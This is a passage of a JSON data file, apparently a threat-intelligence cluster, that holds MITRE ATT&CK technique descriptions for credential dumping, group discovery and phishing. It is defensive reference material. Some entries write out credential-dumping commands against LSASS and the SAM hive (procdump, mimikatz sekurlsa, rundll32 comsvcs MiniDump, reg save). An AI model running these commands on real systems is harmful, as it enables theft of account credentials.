dumped from memory.[[ired Dumping LSA Secrets](https://app.tidalcyber.com/references/cf883397-11e9-4f94-977a-bbe46e3107f5)]\n\n[Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) can be used to extract from the Registry. [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16) can be used to extract secrets from memory.[[ired Dumping LSA Secrets](https://app.tidalcyber.com/references/cf883397-11e9-4f94-977a-bbe46e3107f5)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1003.004" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "b40aa9fa-abb5-47c3-951f-2d454b9bc017", + "value": "LSA Secrets" + }, + { + "description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) using [Use Alternate Authentication Material](https://app.tidalcyber.com/technique/28f65214-95c1-4a72-b385-0b32cbcaea8f).\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* procdump -ma lsass.exe lsass_dump\n\nLocally, mimikatz can be run using:\n\n* sekurlsa::Minidump lsassdump.dmp\n* sekurlsa::logonPasswords\n\nBuilt-in Windows tools such as comsvcs.dll can also be used:\n\n* rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID lsass.dmp full[[Volexity Exchange Marauder March 2021](https://app.tidalcyber.com/references/ef0626e9-281c-4770-b145-ffe36e18e369)][[Symantec Attacks Against Government Sector](https://app.tidalcyber.com/references/f5940cc2-1bbd-4e42-813a-f50867b01035)]\n\n\nWindows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.[[Graeber 2014](https://app.tidalcyber.com/references/f2f9a6bf-b4d9-461e-b961-0610ea72faf0)]\n\nThe following SSPs can be used to access credentials:\n\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.[[TechNet Blogs Credential Protection](https://app.tidalcyber.com/references/88367099-df19-4044-8c9b-2db4c9f418c4)]\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\n* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.[[TechNet Blogs Credential Protection](https://app.tidalcyber.com/references/88367099-df19-4044-8c9b-2db4c9f418c4)]\n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1003.001" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "ab0da102-5a14-42b1-969e-5d3daefdf0c5", + "value": "LSASS Memory" + }, + { + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller.[[Wikipedia Active Directory](https://app.tidalcyber.com/references/924e1186-57e5-43db-94ab-29afa3fdaa7b)]\n\nIn addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.[[Metcalf 2015](https://app.tidalcyber.com/references/1c899028-466c-49b0-8d64-1a954c812508)]\n\nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1003.003" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "c46432d4-bdeb-4dad-bbbd-68ad8ba6aca5", + "value": "NTDS" + }, + { + "description": "Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.[[Picus Labs Proc cump 2022](https://app.tidalcyber.com/references/e8a50a79-6ca4-5c91-87ad-0b1ba9eca505)][[baeldung Linux proc map 2022](https://app.tidalcyber.com/references/b70d04e4-c5f9-5cb2-b896-9bd64e97369e)]\n\nWhen executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.[[MimiPenguin GitHub May 2017](https://app.tidalcyber.com/references/b10cd6cc-35ed-4eac-b213-110de28f33ef)][[Polop Linux PrivEsc Gitbook](https://app.tidalcyber.com/references/a73a2819-61bd-5bd2-862d-5eeed344909f)]\n\nIf running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1003.007" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "81ae71ff-ca5e-4b87-9361-24ebc2c454b3", + "value": "Proc Filesystem" + }, + { + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.\n\nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe\n* [gsecdump](https://app.tidalcyber.com/software/5ffe662f-9da1-4b6f-ad3a-f296383e828c)\n* [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with Reg:\n\n* reg save HKLM\\sam sam\n* reg save HKLM\\system system\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes.[[GitHub Creddump7](https://app.tidalcyber.com/references/276975da-7b5f-49aa-975e-4ac9bc527cf2)]\n\nNotes: \n\n* RID 500 account is the local, built-in administrator.\n* RID 501 is the guest account.\n* User accounts start with a RID of 1,000+.\n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1003.002" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "a95e33ab-7032-4943-ab15-d526420e0cc6", + "value": "Security Account Manager" + }, + { + "description": "Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) and access restricted information.\n\nSeveral of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "cf4d8bb4-2d60-499d-b72c-4957660758c9", + "type": "similar" + }, + { + "dest-uuid": "0a54e0f9-27eb-466b-ae47-53216e6e8065", + "type": "similar" + }, + { + "dest-uuid": "ef7732d9-b629-4037-b5b5-579dafda080b", + "type": "similar" + }, + { + "dest-uuid": "b40aa9fa-abb5-47c3-951f-2d454b9bc017", + "type": "similar" + }, + { + "dest-uuid": "ab0da102-5a14-42b1-969e-5d3daefdf0c5", + "type": "similar" + }, + { + "dest-uuid": "c46432d4-bdeb-4dad-bbbd-68ad8ba6aca5", + "type": "similar" + }, + { + "dest-uuid": "81ae71ff-ca5e-4b87-9361-24ebc2c454b3", + "type": "similar" + }, + { + "dest-uuid": "a95e33ab-7032-4943-ab15-d526420e0cc6", + "type": "similar" + } + ], + "uuid": "368f85f9-2b15-4732-80fe-087694eaf34d", + "value": "OS Credential Dumping" + }, + { + "description": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies [[Superuser Linux Password Policies](https://app.tidalcyber.com/references/c0bbc881-594a-408c-86a2-211ce6279231)] [[Jamf User Password Policies](https://app.tidalcyber.com/references/aa3846fd-a307-4be5-a487-9aa2688d5816)]. Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to discover password policy information (e.g. show aaa, show aaa common-criteria policy all).[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]\n\nPassword policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS [[AWS GetPasswordPolicy](https://app.tidalcyber.com/references/dd44d565-b9d9-437e-a31a-a52c6a21e3b3)].", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "2bf2e498-99c8-4e36-ad4b-e675d95ac925", + "value": "Password Policy Discovery" + }, + { + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.[[Peripheral Discovery Linux](https://app.tidalcyber.com/references/427b3a1b-88ea-4027-bae6-7fb45490b81d)][[Peripheral Discovery macOS](https://app.tidalcyber.com/references/2a3c5216-b153-4d89-b0b1-f32af3aa83d0)] Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "0997d871-875e-41e4-891c-f8a4ed8b2f31", + "value": "Peripheral Device Discovery" + }, + { + "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts [[Microsoft Msolrole](https://app.tidalcyber.com/references/e36f4e3a-61c9-4fdc-98de-d51a2b3b4865)][[GitHub Raindance](https://app.tidalcyber.com/references/321bba10-06c6-4c4f-a3e0-318561fa0fed)].\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.[[Microsoft AZ CLI](https://app.tidalcyber.com/references/cfd94553-272b-466b-becb-3859942bcaa5)][[Black Hills Red Teaming MS AD Azure, 2018](https://app.tidalcyber.com/references/48971032-8fa2-40ff-adef-e91d7109b859)][[Google Cloud Identity API Documentation](https://app.tidalcyber.com/references/67f2719e-74fd-4bc1-9eeb-07d3095a5191)] In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.[[Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022](https://app.tidalcyber.com/references/af755ba2-97c2-5152-ab00-2e24740f69f3)]\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API [[AWS Get Bucket ACL](https://app.tidalcyber.com/references/1eddbd32-8314-4f95-812a-550904eac2fa)]. Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1069.003" + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "9e366f99-7f7d-4407-8915-448a8108c7e0", + "value": "Cloud Groups" + }, + { + "description": "Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n\nCommands such as net group /domain of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1069.002" + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "f14bb7ae-6ba3-4b44-b776-c79867ea9225", + "value": "Domain Groups" + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n\nCommands such as net localgroup of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, dscl . -list /Groups on macOS, and groups on Linux can list local groups.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1069.001" + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "0fa8230a-fd97-4e2c-9923-923044af4291", + "value": "Local Groups" + }, + { + "description": "Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.\n\nAdversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.[[CrowdStrike BloodHound April 2018](https://app.tidalcyber.com/references/fa99f290-e42c-4311-9f6d-c519c9ab89fe)]", + "meta": { + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + }, + { + "dest-uuid": "9e366f99-7f7d-4407-8915-448a8108c7e0", + "type": "similar" + }, + { + "dest-uuid": "f14bb7ae-6ba3-4b44-b776-c79867ea9225", + "type": "similar" + }, + { + "dest-uuid": "0fa8230a-fd97-4e2c-9923-923044af4291", + "type": "similar" + } + ], + "uuid": "f9d61206-3063-4d04-b06f-225f4766bff1", + "value": "Permission Groups Discovery" + }, + { + "description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1566.001" + }, + "related": [ + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "ba553ad4-5699-4458-ae4e-76e1faa43291", + "value": "Spearphishing Attachment" + }, + { + "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.\n\nAdversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an \"IDN homograph attack\").[[CISA IDN ST05-016](https://app.tidalcyber.com/references/3cc2c996-10e9-4e25-999c-21dc2c69e4af)] URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.[[Mandiant URL Obfuscation 2023](https://app.tidalcyber.com/references/b63f5934-2ace-5326-89be-7a850469a563)]\n\nAdversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727)s.[[Trend Micro Pawn Storm OAuth 2017](https://app.tidalcyber.com/references/7d12c764-facd-4086-acd0-5c0287344520)] These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. [[Microsoft OAuth 2.0 Consent Phishing 2021](https://app.tidalcyber.com/references/393e44fe-cf52-4c39-a79f-f7cdd9d8e16a)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1566.002" + }, + "related": [ + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "d08a9977-9fc2-46bb-84f9-dbb5187c426d", + "value": "Spearphishing Link" + }, + { + "description": "Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1566.003" + }, + "related": [ + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "165ba336-3eab-4809-b6fd-d0dcc5478f7f", + "value": "Spearphishing via Service" + }, + { + "description": "Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1)) and/or creating a sense of urgency or alarm for the recipient.\n\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,[[sygnia Luna Month](https://app.tidalcyber.com/references/3e1c2a64-8446-538d-a148-2de87991955a)][[CISA Remote Monitoring and Management Software](https://app.tidalcyber.com/references/1ee55a8c-9e9d-520a-a3d3-1d2da57e0265)] or install adversary-accessible remote management tools ([Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430)) onto their computer.[[Unit42 Luna Moth](https://app.tidalcyber.com/references/ec52bcc9-6a56-5b94-8534-23c8e7ce740f)]\n\nAdversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://app.tidalcyber.com/technique/c0f2efd4-bfc8-43da-9859-14446fb8f289) in order to trick users into divulging MFA credentials or accepting authentication prompts.[[Proofpoint Vishing](https://app.tidalcyber.com/references/7a200d34-b4f3-5036-8582-23872ef27eb1)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1566.004" + }, + "related": [ + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "350c12a3-33f6-5942-8892-4d6e70abbfc1", + "value": "Spearphishing Voice" + }, + { + "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://app.tidalcyber.com/technique/01505d46-8675-408d-881e-68f4d8743d47)).[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)][[Palo Alto Unit 42 VBA Infostealer 2014](https://app.tidalcyber.com/references/c3eccab6-b12b-513a-9a04-396f7b3dcf63)] Another way to accomplish this is by forging or spoofing[[Proofpoint-spoof](https://app.tidalcyber.com/references/fe9f7542-bbf0-5e34-b3a9-8596cc5aa754)] the identity of the sender which can be used to fool both the human recipient as well as automated security tools.[[cyberproof-double-bounce](https://app.tidalcyber.com/references/4406d688-c392-5244-b438-6995f38dfc61)] \n\nVictims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,[[sygnia Luna Month](https://app.tidalcyber.com/references/3e1c2a64-8446-538d-a148-2de87991955a)][[CISA Remote Monitoring and Management Software](https://app.tidalcyber.com/references/1ee55a8c-9e9d-520a-a3d3-1d2da57e0265)] or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872)).[[Unit42 Luna Moth](https://app.tidalcyber.com/references/ec52bcc9-6a56-5b94-8534-23c8e7ce740f)]", + "meta": { + "platforms": [ + "Google Workspace", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + }, + { + "dest-uuid": "ba553ad4-5699-4458-ae4e-76e1faa43291", + "type": "similar" + }, + { + "dest-uuid": "d08a9977-9fc2-46bb-84f9-dbb5187c426d", + "type": "similar" + }, + { + "dest-uuid": "165ba336-3eab-4809-b6fd-d0dcc5478f7f", + "type": "similar" + }, + { + "dest-uuid": "350c12a3-33f6-5942-8892-4d6e70abbfc1", + "type": "similar" + } + ], + "uuid": "d4a36624-50cb-43d3-95af-a2e10878a533", + "value": "Phishing" + }, + { + "description": "Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.[[Sophos Attachment](https://app.tidalcyber.com/references/b4aa5bf9-31db-42ee-93e8-a576ecc00b57)][[GitHub Phishery](https://app.tidalcyber.com/references/6da51561-a813-4802-aa84-1b3de1bc2e14)] The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to craft persuasive and believable lures.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1598.002" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "b18ddaf9-2939-45db-8b2a-2edecc2097ac", + "value": "Spearphishing Attachment" + }, + { + "description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.[[TrendMictro Phishing](https://app.tidalcyber.com/references/621f1c52-5f34-4293-a507-b58c4084a19b)][[PCMag FakeLogin](https://app.tidalcyber.com/references/f652524c-7950-4a8a-9860-0e658a9581d8)] The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.[[Mandiant URL Obfuscation 2023](https://app.tidalcyber.com/references/b63f5934-2ace-5326-89be-7a850469a563)]\n\nAdversaries may also link to \"web bugs\" or \"web beacons\" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.[[NIST Web Bug](https://app.tidalcyber.com/references/b4362602-faf0-5b28-a147-b3153da1903f)]\n\nAdversaries may also be able to spoof a complete website using what is known as a \"browser-in-the-browser\" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.[[ZScaler BitB 2020](https://app.tidalcyber.com/references/c2f01a3b-a164-59b7-be5d-5eec4eb69ee5)][[Mr. D0x BitB 2022](https://app.tidalcyber.com/references/447f6b34-ac3a-58d9-af96-aa1d947a3e0e)]\n\nAdversaries can use phishing kits such as `EvilProxy` and `Evilginx2` to proxy the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e)) in addition to their username and password. This may enable the adversary to then bypass MFA via [Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1).[[Proofpoint Human Factor](https://app.tidalcyber.com/references/143e191f-9175-557b-8fe1-41dbe04867a6)]\n\nFrom the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to craft persuasive and believable lures.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1598.003" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "4a68c72c-79c1-4fed-9107-75bb5b06dfc3", + "value": "Spearphishing Link" + }, + { + "description": "Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish 